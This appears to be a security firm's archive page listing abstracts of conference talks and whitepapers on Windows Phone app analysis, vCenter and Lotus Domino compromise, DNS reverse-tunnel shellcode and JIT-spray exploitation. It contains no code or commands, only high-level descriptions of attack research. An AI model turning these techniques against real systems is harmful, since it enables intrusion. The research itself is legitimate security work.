Close

HAVE QUESTIONS?

A partner account manager can help. Contact us today.

Subscribe me to your mailing list

Research Revealed

  • Presentation “Windows Phone 8 application security” from Hack in Paris 2013

    When the first Windows Phone 8 smartphones were released, the users received a new mobile OS with a lot of functions. The owners of such devices can discover lots of interesting and user-friendly tools for business and leisure… if only security was not an issue. Dmitry Evdokimov, director of ERPScan research group, and Andrey Chasovskikh, financial software developer, spoke about how applications are secured in this OS and what the developers should pay attention to. The experts also presented a tool for analyzing Windows Phone applications and showed the audience how to use the tool to find vulnerabilities.

    The slides are available here.

    Authors: Dmitriy Evdokimov, Andrey Chasovskikh.

    Posted on June 26, 2013 | Filed under Research Revealed
  • Presentation and whitepaper “Inspection of Windows Phone Applications” from BlackHat Abu Dhabi 2012

    The market share of Windows Phone devices continues to grow and so grows the number of WP applications: from simple games and social apps to complex business apps. WP security model is considered to be secure; nevertheless, the application themselves may have potential vulnerabilities.

    In this presentation, we want to show the techniques we use to analyze the security of WP applications. We will introduce a new tool that makes analysis much easier. This tool allows using both static and dynamic (code instrumentation) techniques. In fact, it is an environment for WP application analysis. We will also show on real examples how to find vulnerabilities with this tool and exploit them.

    The slides can be downloaded here.
    The whitepaper can be downloaded here.

    Authors: Dmitriy Evdokimov, Andrey Chasovskikh

    Posted on December 3, 2012 | Filed under Research Revealed
  • Presentation “How to Hack VMware vCenter Server in 60 Seconds” from DEFCON 2012

    This talk will discuss some ways to gain control over the virtual infrastructure through vCenter's services. I will describe a few non-dangerous bugs (they were 0-days when we found them), but if we can use all of them together, we will get administrative access to vCenter which means to the whole virtual network.

    Author: Alexander Minozhenko

    Presentation "How to Hack VMware vCenter Server in 60 Seconds" from DEFCON 2012.

    Posted on August 13, 2012 | Filed under Research Revealed
  • Presentation “Light and Dark side of Code Instrumentation” from CONFidence Krakow 2012

    Development technologies evolve rapidly – code becomes more complex (virtual function, jit-code etc.). Such code is extremely difficult for static analisys. Various techniques of code instrumentation assist us. Instrumentation libraries (PIN, Valgrind, DynamoRIO, DynInst) are the most up-to-date essential tools in a security researcher's kit. The most important research cannot be done without code instrumentation nowadays. I will tell you about the existing methods of instrumentation (Source Code instrumentation, Bytecode Instrumentation, Binary Code Instrumentation), from the simplest to the most complex ones, and about their pros and cons when the question is about solving various problems of the security researchers.

    Author: Dmitriy Evdokimov.

    Presentation "Light and Dark side of Code Instrumentation" from CONFidence Krakow 2012
    Posted on June 6, 2012 | Filed under Research Revealed
  • Whitepaper “Python arsenal for Reverse Engineering” v1.1

    This whitepaper (version 1.1) is a collection of various Python engines, extensions, libraries, shells, that aids in the job code for understanding, analyzing and sometimes breaking. The collection consists of more than 40 projects. This document is intended to show the power of Python for RE and also an attempt to systematize a knowledge of the python for RE. This document is useful for beginners and advanced professionals of RE.

    Dmitriy Evdokimov — author of whitepaper and Researcher of ERPScan:

    Python programming language has become a language of hackers. And it is not surprising, because it has all the necessary qualities: free, portable, powerful, mixable, easy to learn etc. A great role in this were played by such projects as IDA Pro, WinDBG, OllyDebug, gdb, which, being a de-facto standard among disassemblers and debuggers, eventually began to support the scripting engines in Python. Of course, they had maintained their own API for plug-in developing, and it was not a small number of them, but exactly with the appearance of the Python support they received a strong push in the development: increased the number of plug-in, increased community, and of course their flexibility also increased, which allowed them to interact both with each other and with other applications, using the best aspects of each other. But in the beginning of the path there was naturally only hacker spirit and idea.
    Python arsenal for RE 1.1.pdf
    Posted on April 26, 2012 | Filed under Research Revealed
  • Whitepaper “Lotus Domino: Penetration Through the Controller” from BlackHat Europe 2012

    On the BlackHat Europe conference held from March 14 to March 16, Alexey Sintsov, head of information security audit department in ERPScan Company, shared his experience in penetration testing and presented the results of a recently conducted research of Lotus Domino security.

    His presentation told about lack of time and frequently desire for companies to dig into the details of existing vulnerabilities to exploit them, and how it often impairs the quality of their work.

    In the demonstration, a private vulnerability in Lotus Domino was quite quickly disassembled, the resulting exploit used, the existing patch bypassed and a critical 0-day vulnerability found. The result was an attack on the Domino Controller service (the Lotus Domino administration service) which allows full server compromise.

    Whitepaper "Lotus Domino: Penetration Through the Controller", BlackHat Europe 2012

    Posted on March 26, 2012 | Filed under Research Revealed
  • Presentation “Lotus Domino: Penetration Through the Controller” from BlackHat Europe 2012

    On the BlackHat Europe conference held from March 14 to March 16, Alexey Sintsov, head of information security audit department in ERPScan Company, shared his experience in penetration testing and presented the results of a recently conducted research of Lotus Domino security.

    His presentation told about lack of time and frequently desire for companies to dig into the details of existing vulnerabilities to exploit them, and how it often impairs the quality of their work.

    In the demonstration, a private vulnerability in Lotus Domino was quite quickly disassembled, the resulting exploit used, the existing patch bypassed and a critical 0-day vulnerability found. The result was an attack on the Domino Controller service (the Lotus Domino administration service) which allows full server compromise.

    "Lotus Domino: Penetration Through the Controller", BlackHat Europe 2012

    Posted on March 26, 2012 | Filed under Research Revealed
  • Whitepaper “Python arsenal for Reverse Engineering”

    This whitepaper (beta release) is a collection of various Python engines, extensions, libraries, shells, that aids in the job code for understanding, analyzing and sometimes breaking. The collection consists of more than 40 projects. This document is intended to show the power of Python for RE and also an attempt to systematize a knowledge of the python for RE. This document is useful for beginners and advanced professionals of RE.

    Dmitriy Evdokimov — author of whitepaper and Researcher of ERPScan:

    Python programming language has become a language of hackers. And it is not surprising because it has all the necessary qualities: free, portable, powerful, mixable, easy to learn etc. A great role in this was played by such projects as IDA Pro, WinDBG, OllyDebug, gdb, which, being a de-facto standard among disassemblers and debuggers, eventually began to support the scripting engines in Python. Of course, they had maintained their own API for plug-in developing, and it was not a small number of them, but exactly with the appearance of the Python support they received a strong push in the development: increased the number of plug-in, increased community, and of course their flexibility also increased, which allowed them to interact both with each other and with other applications, using the best aspects of each other. But in the beginning of the path, there was naturally only hacker spirit and idea.
    Python arsenal for RE.pdf
    Posted on July 6, 2011 | Filed under Research Revealed
  • Presentation “DNS for EVIL” from CONFidence Krakow 2011

    Talk about DNS reverse tunnel that author uses for penetration tests. Finally was published own reverse DNS shellcode and payload that was written especially for pen-test tasks. This work also demonstrates how malware C&C and BOT can work together. The main idea of this work that it's necessary to pay more attention to the DNS traffic.

    Download this presentation

    Posted on June 6, 2011 | Filed under Research Revealed
  • Presentation “JIT-Spray Attacks and Advanced Shellcode” from HITB Amsterdam 2010

    Here are the slides from Hack In The Box (HITB) 2010 held in Amsterdam, Netherlands where DSecRG experts gave a talk on JIT-SPRAY technique for DEP and ASLR bypass. Here are presented the methods that improve exploit work time for Flash JIT-SPRAY from 8 minutes to 10 seconds; and also shown the way of using Safari JavaScript JIT compiler to bypass DEP and ASLR in Windows 7.

    Author: Alexey Sintsov

    JIT-Spray Attacks and Advanced Shellcode

    Posted on July 5, 2010 | Filed under Research Revealed